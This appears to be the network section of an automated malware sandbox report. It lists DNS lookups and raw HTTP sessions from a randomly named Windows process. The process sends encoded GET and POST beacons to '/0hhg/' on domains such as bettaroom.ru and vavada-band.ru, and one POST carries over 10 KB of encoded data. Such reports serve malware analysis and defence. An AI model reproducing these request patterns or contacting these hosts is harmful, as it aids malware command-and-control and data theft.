                                                                                                    May 2, 2024 08:27:57.249764919 CEST5742353192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:57.446818113 CEST53574231.1.1.1192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    May 2, 2024 08:24:42.305643082 CEST192.168.2.41.1.1.10xf080Standard query (0)www.vavada-band.ruA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:00.439603090 CEST192.168.2.41.1.1.10xcb70Standard query (0)www.bettaroom.ruA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:18.798521042 CEST192.168.2.41.1.1.10xa6afStandard query (0)www.dhleba51.ruA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:33.814400911 CEST192.168.2.41.1.1.10xfbd3Standard query (0)www.dainikmirpur.comA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:51.518388987 CEST192.168.2.41.1.1.10x2cc1Standard query (0)www.whirledairlines.comA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:05.378520966 CEST192.168.2.41.1.1.10x31aStandard query (0)www.quantummquest.topA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:19.580396891 CEST192.168.2.41.1.1.10x9a84Standard query (0)www.yamiyasheec.onlineA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:36.080804110 CEST192.168.2.41.1.1.10xb152Standard query (0)www.applesolve.comA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:51.503310919 CEST192.168.2.41.1.1.10x839aStandard query (0)www.xxaiai.topA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:07.446336031 CEST192.168.2.41.1.1.10x5260Standard query (0)www.vaesen.netA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:15.830028057 CEST192.168.2.41.1.1.10xe6b5Standard query (0)www.dk48.lolA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:30.429325104 CEST192.168.2.41.1.1.10x7837Standard query (0)www.cluird.cloudA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:39.048943996 CEST192.168.2.41.1.1.10xa81dStandard query (0)www.cucuzeus88.storeA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:57.249764919 CEST192.168.2.41.1.1.10xee7bStandard query (0)www.bnbuotqakx.shopA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    May 2, 2024 08:24:43.243988991 CEST1.1.1.1192.168.2.40xf080No error (0)www.vavada-band.ruvavada-band.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:24:43.243988991 CEST1.1.1.1192.168.2.40xf080No error (0)vavada-band.ru148.251.36.121A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:01.043719053 CEST1.1.1.1192.168.2.40xcb70No error (0)www.bettaroom.ru194.58.112.173A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:19.747693062 CEST1.1.1.1192.168.2.40xa6afNo error (0)www.dhleba51.ru195.24.68.5A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:34.013406992 CEST1.1.1.1192.168.2.40xfbd3No error (0)www.dainikmirpur.comdainikmirpur.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:34.013406992 CEST1.1.1.1192.168.2.40xfbd3No error (0)dainikmirpur.com192.250.235.36A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:51.734960079 CEST1.1.1.1192.168.2.40x2cc1No error (0)www.whirledairlines.com216.40.34.41A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:05.568423986 CEST1.1.1.1192.168.2.40x31aNo error (0)www.quantummquest.top203.161.50.127A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:20.311863899 CEST1.1.1.1192.168.2.40x9a84No error (0)www.yamiyasheec.onlineyamiyasheec.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:20.311863899 CEST1.1.1.1192.168.2.40x9a84No error (0)yamiyasheec.online119.18.54.116A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:36.639506102 CEST1.1.1.1192.168.2.40xb152No error (0)www.applesolve.comapplesolve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:36.639506102 CEST1.1.1.1192.168.2.40xb152No error (0)applesolve.com188.116.38.155A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:52.157618999 CEST1.1.1.1192.168.2.40x839aNo error (0)www.xxaiai.top108.186.8.158A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:07.570497036 CEST1.1.1.1192.168.2.40x5260Name error (3)www.vaesen.netnonenoneA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:16.118583918 CEST1.1.1.1192.168.2.40xe6b5No error (0)www.dk48.lolparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:16.118583918 CEST1.1.1.1192.168.2.40xe6b5No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:30.992764950 CEST1.1.1.1192.168.2.40x7837Name error (3)www.cluird.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:39.328984022 CEST1.1.1.1192.168.2.40xa81dNo error (0)www.cucuzeus88.storecucuzeus88.storeCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:39.328984022 CEST1.1.1.1192.168.2.40xa81dNo error (0)cucuzeus88.store153.92.8.41A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:57.446818113 CEST1.1.1.1192.168.2.40xee7bNo error (0)www.bnbuotqakx.shopbnbuotqakx.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:57.446818113 CEST1.1.1.1192.168.2.40xee7bNo error (0)bnbuotqakx.shop101.99.93.157A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • www.vavada-band.ru
                                                                                                    • www.bettaroom.ru
                                                                                                    • www.dhleba51.ru
                                                                                                    • www.dainikmirpur.com
                                                                                                    • www.whirledairlines.com
                                                                                                    • www.quantummquest.top
                                                                                                    • www.yamiyasheec.online
                                                                                                    • www.applesolve.com
                                                                                                    • www.xxaiai.top
                                                                                                    • www.dk48.lol
                                                                                                    • www.cucuzeus88.store
                                                                                                    • www.bnbuotqakx.shop

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449736148.251.36.12180916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:24:43.587449074 CEST438OUTGET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= HTTP/1.1
                                                                                                    Host: www.vavada-band.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:24:43.763344049 CEST501INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:24:43 GMT
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449738194.58.112.17380916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:02.266545057 CEST699OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bettaroom.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bettaroom.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.bettaroom.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 37 32 47 57 4f 2b 62 4f 47 46 35 32 47 46 58 2f 6b 6a 36 36 75 33 50 6f 77 6d 72 36 50 37 55 49 4d 52 4b 76 2b 32 57 65 66 31 76 38 55 4b 45 75 67 48 57 66 4b 7a 64 6b 30 53 31 6f 37 32 69 75 4e 74 37 72 74 4e 35 46 6a 53 4d 78 59 6d 66 51 64 30 4a 56 7a 54 36 53 4b 70 39 36 70 35 4e 31 6e 47 75 47 73 6d 4d 6a 4a 78 74 54 59 73 6c 71 46 6d 7a 6d 37 74 57 2f 38 37 57 45 66 63 6c 51 76 37 57 77 34 66 46 6b 78 48 70 7a 4a 4c 50 32 51 68 75 79 4c 76 54 71 47 6e 48 57 66 47 6a 32 47 47 48 44 36 68 46 51 49 4b 71 54 71 33 2f 74 58 56 4f 5a 6a 61 57 48 79 69 58 73 4a 44 62 4f 6c 51 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=72GWO+bOGF52GFX/kj66u3Powmr6P7UIMRKv+2Wef1v8UKEugHWfKzdk0S1o72iuNt7rtN5FjSMxYmfQd0JVzT6SKp96p5N1nGuGsmMjJxtTYslqFmzm7tW/87WEfclQv7Ww4fFkxHpzJLP2QhuyLvTqGnHWfGj2GGHD6hFQIKqTq3/tXVOZjaWHyiXsJDbOlQ==
                                                                                                    May 2, 2024 08:25:02.513768911 CEST580INHTTP/1.1 301 Moved Permanently
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:25:02 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 309
                                                                                                    Connection: close
                                                                                                    Location: http://betta-dom.ru/0hhg/
                                                                                                    Expires: Thu, 02 May 2024 06:30:02 GMT
                                                                                                    Cache-Control: max-age=300
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 20 20 20 20 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 3c 70 3e 54 68 69 73 20 69 74 65 6d 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 65 74 74 61 2d 64 6f 6d 2e 72 75 2f 30 68 68 67 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Moved</title> </head> <body> <p>This item has moved <a href="http://betta-dom.ru/0hhg/">here</a>.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.449739194.58.112.17380916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:05.004878998 CEST719OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bettaroom.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bettaroom.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.bettaroom.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 37 32 47 57 4f 2b 62 4f 47 46 35 32 47 6c 48 2f 6c 41 43 36 6e 33 50 6e 2f 47 72 36 56 4c 55 4d 4d 52 32 76 2b 33 53 4f 66 47 4c 38 55 72 30 75 68 47 57 66 4e 7a 64 6b 36 79 31 58 31 57 69 68 4e 74 33 6a 74 49 5a 46 6a 53 59 78 59 6e 76 51 63 48 68 55 78 44 36 63 66 35 39 38 32 70 4e 31 6e 47 75 47 73 6d 49 4a 4a 77 46 54 59 35 74 71 46 48 7a 6c 6e 64 57 38 71 72 57 45 56 38 6c 55 76 37 57 43 34 65 70 4f 78 45 64 7a 4a 4b 2f 32 51 30 43 31 45 76 54 7a 43 6e 47 34 54 54 57 43 4f 6b 53 79 30 54 70 6a 4b 62 47 4c 69 52 75 33 47 6b 76 4f 78 61 79 30 76 6c 65 59 45 41 6d 48 2b 56 71 50 77 73 62 2f 72 36 53 37 31 71 42 30 35 67 69 58 6a 7a 73 3d
                                                                                                    Data Ascii: ABqDW6A8=72GWO+bOGF52GlH/lAC6n3Pn/Gr6VLUMMR2v+3SOfGL8Ur0uhGWfNzdk6y1X1WihNt3jtIZFjSYxYnvQcHhUxD6cf5982pN1nGuGsmIJJwFTY5tqFHzlndW8qrWEV8lUv7WC4epOxEdzJK/2Q0C1EvTzCnG4TTWCOkSy0TpjKbGLiRu3GkvOxay0vleYEAmH+VqPwsb/r6S71qB05giXjzs=
                                                                                                    May 2, 2024 08:25:05.224246025 CEST580INHTTP/1.1 301 Moved Permanently
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:25:05 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 309
                                                                                                    Connection: close
                                                                                                    Location: http://betta-dom.ru/0hhg/
                                                                                                    Expires: Thu, 02 May 2024 06:30:05 GMT
                                                                                                    Cache-Control: max-age=300
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 20 20 20 20 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 3c 70 3e 54 68 69 73 20 69 74 65 6d 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 65 74 74 61 2d 64 6f 6d 2e 72 75 2f 30 68 68 67 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Moved</title> </head> <body> <p>This item has moved <a href="http://betta-dom.ru/0hhg/">here</a>.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.449740194.58.112.17380916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:09.804352999 CEST10801OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bettaroom.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bettaroom.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.bettaroom.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 37 32 47 57 4f 2b 62 4f 47 46 35 32 47 6c 48 2f 6c 41 43 36 6e 33 50 6e 2f 47 72 36 56 4c 55 4d 4d 52 32 76 2b 33 53 4f 66 47 44 38 55 34 38 75 67 6c 2b 66 4d 7a 64 6b 79 53 31 73 31 57 69 38 4e 75 48 64 74 49 64 37 6a 51 67 78 4b 52 37 51 4a 47 68 55 37 44 36 63 64 35 39 35 70 35 4d 74 6e 47 2b 4b 73 6d 59 4a 4a 77 46 54 59 34 64 71 4d 32 7a 6c 30 4e 57 2f 38 37 57 32 66 63 6b 4c 76 37 4f 34 34 65 64 30 79 79 74 7a 4a 71 76 32 53 47 36 31 4e 76 54 78 4f 48 47 57 54 54 53 64 4f 6b 50 4e 30 58 6f 72 4b 59 61 4c 6e 56 33 67 53 6b 33 34 67 49 2b 55 30 6e 61 37 4c 69 7a 44 7a 79 65 7a 30 75 6e 72 34 4f 53 34 2f 6f 73 42 6c 79 36 44 2b 45 47 54 2b 42 63 68 73 4d 32 45 31 70 44 73 52 71 6f 42 4a 36 75 6d 74 7a 78 64 6f 32 32 46 6d 7a 45 58 52 76 64 59 67 55 42 37 39 64 33 53 76 39 39 69 52 34 78 39 4d 4c 37 32 46 4d 6f 4b 6d 49 37 4c 50 37 72 52 77 39 56 52 52 4e 76 62 76 51 72 63 34 37 38 4d 43 67 32 39 6b 6b 57 35 6b 50 6c 33 31 53 66 4e 54 61 47 62 37 2f 41 32 74 4b 6e 73 5a [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=72GWO+bOGF52GlH/lAC6n3Pn/Gr6VLUMMR2v+3SOfGD8U48ugl+fMzdkyS1s1Wi8NuHdtId7jQgxKR7QJGhU7D6cd595p5MtnG+KsmYJJwFTY4dqM2zl0NW/87W2fckLv7O44ed0yytzJqv2SG61NvTxOHGWTTSdOkPN0XorKYaLnV3gSk34gI+U0na7LizDzyez0unr4OS4/osBly6D+EGT+BchsM2E1pDsRqoBJ6umtzxdo22FmzEXRvdYgUB79d3Sv99iR4x9ML72FMoKmI7LP7rRw9VRRNvbvQrc478MCg29kkW5kPl31SfNTaGb7/A2tKnsZQ2rVYP6iGqyivQnbAgfEXx4Pg2FiFafCi0CMyrX21P9FOP4AsmBx3iBKrOFrOHyBqNchGv8OhyCl/Zmy5nPRi+ZxP1lh5TYGyBh3GyCdh331ke7YmBuxwnqid/a/pFgWmIx5aaHbrGiJYTv2x5fC1EHNL1DD9e8hxg9Ayr+N7kRDkKEZG+didxE0Rnl2GZrOtHXKyRUQoKcO59v1mk/gEgwrD5HUUsK6SGCEiYsOEBTVaFQmTHUlNb2oYRkBXMlZXu7BNl+zKQ9kU3xpLMTbjkiQqM05zEBIDIYN11xAiqGOKyLJxHDUErWvPlsNOTIHuPhcF7uZ1Kahi077Yo1/tCh8vgfSVh9OdApez9lIClLZO3Uc508NmW3gArfIR04Ax6n5z0BIPGWpIN+5waooElG/hHRa1bHCnvIN+A1oSVbkiYL3gROXKVw2pQYmQc7JI82hmYZXCfSQE/PVb2dopohrSg3db8s/ScSMZpLfePWW/OXZsELj1gd/4tV6iMtJk9Bi+3QsCytnpkFFFQDIEATFszo0fRoP/AXu6mMKC0BkmRDNyWjgIeMlPymDYhB6sW/KPEBV09uWJGNg0Cw919iG8ZGo3B2ZyfzixbuZpo+Z4Az7YJ9WddYZ1MhLL1aK4yEzAzkQe5gw+M8vohLYtHvTSASwS89SSu [TRUNCATED]
                                                                                                    May 2, 2024 08:25:10.032634020 CEST580INHTTP/1.1 301 Moved Permanently
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:25:09 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 309
                                                                                                    Connection: close
                                                                                                    Location: http://betta-dom.ru/0hhg/
                                                                                                    Expires: Thu, 02 May 2024 06:30:09 GMT
                                                                                                    Cache-Control: max-age=300
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 20 20 20 20 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 3c 70 3e 54 68 69 73 20 69 74 65 6d 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 65 74 74 61 2d 64 6f 6d 2e 72 75 2f 30 68 68 67 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Moved</title> </head> <body> <p>This item has moved <a href="http://betta-dom.ru/0hhg/">here</a>.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.449741194.58.112.17380916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:12.829895973 CEST436OUTGET /0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&nNWXI=ybhXiHipjHJ HTTP/1.1
                                                                                                    Host: www.bettaroom.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:25:13.080692053 CEST880INHTTP/1.1 301 Moved Permanently
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:25:12 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 461
                                                                                                    Connection: close
                                                                                                    Location: http://betta-dom.ru/0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&nNWXI=ybhXiHipjHJ
                                                                                                    Expires: Thu, 02 May 2024 06:30:12 GMT
                                                                                                    Cache-Control: max-age=300
